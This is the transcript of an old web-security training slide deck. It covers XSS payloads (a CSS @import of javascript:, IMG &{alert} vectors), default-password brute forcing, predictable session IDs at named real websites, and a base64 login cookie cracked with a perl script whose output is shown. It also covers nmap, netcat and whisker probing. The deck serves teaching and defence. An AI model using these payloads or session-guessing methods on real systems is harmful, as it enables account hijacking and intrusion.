Using feature in CSS may be used to perform JavaScript protocol SRCing. <style TYPE="text/css"> @import url(javascript:alert('Javascript is executed')); </style> SECURITY INNOVATION ©2003

…AND CURLY Syntax must be exact.
<IMG SRC="&{javascript_expression};"> <IMG SRC="&{alert(‘alert’)};"> Syntax must be exact. SECURITY INNOVATION ©2003

Dangerous HTML Tags “All HTML is to be considered dangerous, but these tags are the most insidious.” <APPLET> <BODY> <EMBED> <FRAME> <FRAMESET> <HTML> <IFRAME> <IMG> <LAYER> <ILAYER> <META> <OBJECT> <SCRIPT> <STYLE> SECURITY INNOVATION ©2003

Dangerous HTML Attributes
(HTML Tags with these attributes.) SRC LOWSRC STYLE HREF SECURITY INNOVATION ©2003

Web Applications Logins
SECURITY INNOVATION ©2003

Traditional Brute Force
guest Admin 123123 Password Etc. SECURITY INNOVATION ©2003

Session ID Overview HTTP is stateless protocol
Rather than make a user authenticate upon each click in a web application, a sense of “state” is created In order to maintain state, a shared string, token, or secret between HTTP client and server is usually used by developers Essentially, authentication data (username/password) exchanged for “Session ID” SECURITY INNOVATION ©2003

Web State Attacks Session Replay Session Hijacking
A traditional replay attack in the cryptography sense is an attack in which a valid data transmission is maliciously or fraudulently repeated, either by the originator or by an adversary who intercepts the data and retransmits it. Session Hijacking Seizing control of a legitimate user's web application session while that user is “logged in” to the application SECURITY INNOVATION ©2003

Session ID Overview While it is generally clear that username/password pairs are indeed authentication data and therefore sensitive, it is not generally understood that session IDs are also just as sensitive because of their frequent use for authentication. See RFC 2964 (Use of HTTP State Management). SECURITY INNOVATION ©2003

Session ID Overview Session IDs are commonly stored in cookies and/or URLs, and hidden fields of web pages (or some combination) Session ID generated by WEB SERVER (IIS, etc.) when the user first hits the site or by WEB APPLICATION (ATG dynamo, Apache Tomcat, BEA Websphere, .jsp, .asp, perl, etc.) when the user logs in SECURITY INNOVATION ©2003

Cookie Refresher Sometimes the cookies are set to expire (i.e., be deleted) upon closing the browser; these are typically called “session cookies” or “non-persistent” cookies Persistent cookies last beyond a user’s session (i.e. “Remember Me” option) Persistent cookies are usually stored on the user’s hard drive in a location according to the particular operating system and browser (e.g. , C:\Program files\netscape \users\username\cookies.txt for Netscape and C:\Documents and Settings \username\Cookies for IE on Win2K). SECURITY INNOVATION ©2003

Cookie Refresher Cookie Refresher (RFC 2965) 1 2 3 4 5 6 7
1.) domain: The website domain that created and that can read the variable. 2.) flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the variable. 3.) path: Pathname of the URL(s) capable of accessing the cookie from the domain. 4.) secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed to access the variable. 5.) expiration: The Unix time that the variable will expire on. Unix time is defined as the number of seconds since 00:00:00 GMT on Jan 1, Omitting the expiration date signals to the browser to store the cookie only in memory; it will be erased when the browser is closed. (expires July 27, 2006) 6.) name: The name of the Session ID variable (in this case Apache). 7.) value: The value of the Session ID variable (in this case ) . 1 2 3 4 5 6 7 FALSE / Apache SECURITY INNOVATION ©2003

Cookie Stored Session ID Examples
.starwars.com TRUE / FALSE Wookie-Cookie 13fe8fff4799f27dcf19c959dafa8437 . TRUE /rc FALSE sauidp p DCC F75FEF2 .ebay.com TRUE / FALSE lucky8 694036 .amazon.com FALSE / session-id .yahoo.com TRUE / FALSE B 3qpaarsu48dai&b=2 .yahoo.com TRUE / FALSE I ir=9p&in=4aweec66&i1=AFABCl .yahoo.com TRUE / FALSE PU t=1 SECURITY INNOVATION ©2003

Session IDs in HTML Hidden Fields
<FORM METHOD=POST ACTION="/cgi-bin/bankonline.cgi"> <input type="hidden" name="sessionID" value=”abcde1234”> <input type="hidden" name="useraccount" value=” ”> <input type="submit" name="Access My Bank Information"></form> SECURITY INNOVATION ©2003

Session ID Security Overview
Session ID security is a microcosm of Web Application Security. Web Application Security cuts through many different aspects of an organization’s information security infrastructure SECURITY INNOVATION ©2003

An Example: Brute Forcing Session ID’s in URLS
Dear Terry Gillette, An Anonymous Admirer has sent you a greeting card from 123Greetings.com, a FREE service committed to keep people in touch. To see your greeting card, choose from any of the following options which works best for you. Method 1 Just click on the following Internet address (if that doesn't work for you, copy & paste the address onto your browser's address box.) SECURITY INNOVATION ©2003

An Example: Brute Forcing Session ID’s in URLS
As we start to associate that the date we sent these electronic cards on was July 25 at 12:21 PST, we can start to eliminate some more entropy out of this session ID ( ). Notice then that we’re left with five incrementing “random” digits at the end of the URL. SECURITY INNOVATION ©2003

An Example: Brute Forcing Session ID’s in URLS AUTOMATED DEMO!

Why Brute Forcing Web Session ID’s is Bad
Can result in an online user’s web application account being hijacked or loss of privacy Easy to exploit Unlike typical login scenario, no failed login lockout Prevalent disclosure among security mailing lists Typical security solutions (firewalls, IDS, etc.) do nothing to detect attacks Log data is usually not that detailed IDS is not well developed for Web Application attacks SSL (Server side) does nothing to protect against these attacks SECURITY INNOVATION ©2003

URL Example: Brute Forcing Register.com
Thank you for using register.com's Domain Manager. To change or re-enter your password, please copy and paste the URL below into the "Location" or "Address" field of your web browser and hit the 'Enter' key on your keyboard. Note: If your program supports HTML, you may be able to click on the link below. Note: Above link will be expire within three days SECURITY INNOVATION ©2003

Example 2: Brute Forcing Web Session ID’s

URL Example – Brute Forcing Dfilm.com
-----Original Message----- From: Sent: Monday, July 01, :38 PM To: Subject: D.FILM Digital Movie for Dave Dave created a digital movie for you! You can view it at the following URL: Cheers, Dave and DFILM. Be sure to check out the web site at SECURITY INNOVATION ©2003

URL Example – Sendomatic.com

URL Example – Sendomatic.com
View other people’s events. Crash a party, edit an event, cancel and event, etc. SECURITY INNOVATION ©2003

Cookie Example – Freeservers.com

LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0; Base 64 decode the string: testing123.itgo.com: username:password Next, automate it with a perl exploit by feeding encoded strings in to the cookie SECURITY INNOVATION ©2003

%perl freeservershack.pl trying test trying test123 trying trying Cracked it! The password to testing123.itgo.com is GET User-Agent: Mozilla/4.75 [en] (Windows NT 5.0; U) Cookie: LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM%3D Cookie2: $Version=1 % SECURITY INNOVATION ©2003

6 Common Problems Weak Algorithm – Many of the most popular web sites today are currently using linear algorithms based on easily predictable variables such as time or IP address. No Form of Account Lockout – With regard to Session ID brute force attacks, an attacker can probably try hundreds or thousands of Session IDs embedded in a legitimate URL without a single complaint from the web server. Short Key Space – Even the most cryptographically strong algorithm still allows an active Session ID to be easily determined if the size of the string’s key space is not sufficiently large. SECURITY INNOVATION ©2003

6 Common Problems – Continued
Indefinite Expiration on Server– Session IDs that do not expire on the web server can allow an attacker unlimited time to guess a valid Session ID. Transmitted in the Clear – Assuming SSL is not being used while the Session ID cookie is transmitted to and from the browser, the Session ID could be sniffed across a flat network taking the guess-work away for a miscreant. This is still a problem with proxy servers. Insecure Retrieval – By tricking the user’s browser into visiting another site, an attacker can retrieve stored Session ID information and quickly exploit this information before the user’s sessions expire. This can be done a number of ways: DNS poisoning, Cross-site Scripting, etc. SECURITY INNOVATION ©2003

Tools Sessions Auditor www.idefense.com/idtools/Session_Auditor.zip
Visual Testing – WebSleuth WebProxy - HTTPush - httpush.sourceforge.net Achilles - MiniBrowser - aignes.com/download.htm SECURITY INNOVATION ©2003

Why Automated Tools Don’t Work Very Well
Some good things: Completeness Large knowledge bases (at least possibly) Puts Web security assessment into the hands of anyone who calls themselves a “Information Security Expert”. SECURITY INNOVATION ©2003

Why Automated Tools Don’t Work Very Well
Every programmer does things a little different Authentication schemes are hard to automate Error codes are not standardized Sometimes simple things like SSL get in the way SECURITY INNOVATION ©2003

Why People are Better Recognition of subtle errors
We understand the impact and therefore the risk of a vulnerability We are grounded in the fundamentals of Computer Science and therefore are able to find “real” bugs, flaws in logic SECURITY INNOVATION ©2003

Web Hacking Accessories
Some helpful tools include…. A port scanner (Nmap et. al.) Netcat; the network swiss army knife A vulnerability scanner; Whisker Open SSL source and documentation OpenSSL, RFC 2246 The OpenSSL ssl library implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols. It provides a rich API which is documented at SECURITY INNOVATION ©2003

New tools on the horizon…
Nikto CGI scanner, similar to whisker 1.4. Checks for CGIs, common dirs, and old versions Database frequently updated WHArsenal Set of CGIs that plug into an existing Apache install. Allows for all kinds of requests, while controling/modifying request particulars. @stake WebProxy Assessment proxy with full fuzzer/rewriting capabilities. Implemented in Java; supports Linux, Solaris, and Windows. Nessus Has a few new interesting web assessment plugins which do site crawling/mirroring and a few other interesting things. SECURITY INNOVATION ©2003

Basic Training for Web Combat…
Port scanning Look for well-known TCP web ports. 80, 81, 443, 8000, 8080, etc… Using FScan (from Foundstone) fscan -p 80,81,443,8000, Using nmap (by Fyodor) nmap -p 80,81,443,8000, SECURITY INNOVATION ©2003

Fingerprinting HTTP Banner grabbing. netcat as a TCP client (even telnet works) nc HEAD / HTTP/1.0 Advanced HTTP methods: TRACE, OPTIONS, etc. TRACE allows the client to see what is being received at the other end of the request chain and use that data for testing or diagnostic information. The value of the Via header field (section 14.44) is of particular interest, since it acts as a trace of the request chain. Use of the Max-Forwards header field allows the client to limit the length of the request chain, which is useful for testing a chain of proxies forwarding messages in an infinite loop. The OPTIONS method represents a request for information about the communication options available on the request/response chain identified by the Request-URI. This method allows the client to determine the options and/or requirements associated with a resource, or the capabilities of a server, without implying a resource action or initiating a resource retrieval. SECURITY INNOVATION ©2003

Shaking the tree for the low hanging fruit…. Scan using a database of known web vulnerabilities. Whisker (by Rain Forest Puppy) ./whisker.pl -h I 1 cgichk.c <snip> "GET /cgi-bin/phf HTTP/1.0\n\n"; "GET /cgi-bin/Count.cgi HTTP/1.0\n\n"; "GET /cgi-bin/test-cgi HTTP/1.0\n\n"; "GET /cgi-bin/php.cgi HTTP/1.0\n\n ISS, Cybercop, Retina, etc. SECURITY INNOVATION ©2003

el33t hax0r Training for Web Combat…
What about SSL? Some SSL Myths: “We are secure because we use SSL!” “Strong 128 bit crypto being used” “We use Digital Certificates signed by VeriSign” SECURITY INNOVATION ©2003

Proxy Over SSL Using netcat and OpenSSL, it is possible to create a simple two-line SSL Proxy! Listen on port 80 on a host and redirect requests to port 443 on a remote host through SSL. SSL web server Web client nc openssl SECURITY INNOVATION ©2003

Assessment Tools Vulnerability scanners
Look for a known list of vulnerable applications or technologies Do not (can not) engage/scan custom applications and configurations General vulnerability scanners: ISS, Cybercop, Nessus Web-specific vulnerability scanners: WebInspect, whisker SECURITY INNOVATION ©2003

Assessment tools ‘Proxy monitors’
HTTP proxy which monitors traffic, looking for web vulnerabilities as they pass Can analyze custom applications with the help of a user Examples: AppScan, RFProxy, HTTPush, Achilles SECURITY INNOVATION ©2003

Root Causes of Web Hacks
Complex web architectures may cause oversight in web server configuration. URL Parsing. File Canonicalization. Combination of underlying operating system and web server may leave holes. SECURITY INNOVATION ©2003

Root Causes of Web Hacks
Untested code used in web applications, to save time. Level of security consciousness low in web application developers. Security vs. convenience. Security vs. time-to-market. Zero knowledge administration breeds zero knowledge administrators. iDEFENSE paper on Brute Forcing Session ID’s, -> whitepapers CGI SECURITY, WhiteHat Security, Web Application Security Mailing List, MIT Cookie EATERS “Dos and Don'ts of Client Authentication on the Web” SECURITY INNOVATION ©2003

Network Security Part II: Attacks

Similar presentations

Presentation on theme: "Network Security Part II: Attacks"— Presentation transcript:

Similar presentations

About project

Feedback

Log in

Auth with social network:

Network Security Part II: Attacks

Similar presentations

Presentation on theme: "Network Security Part II: Attacks"— Presentation transcript:

Similar presentations

About project

Feedback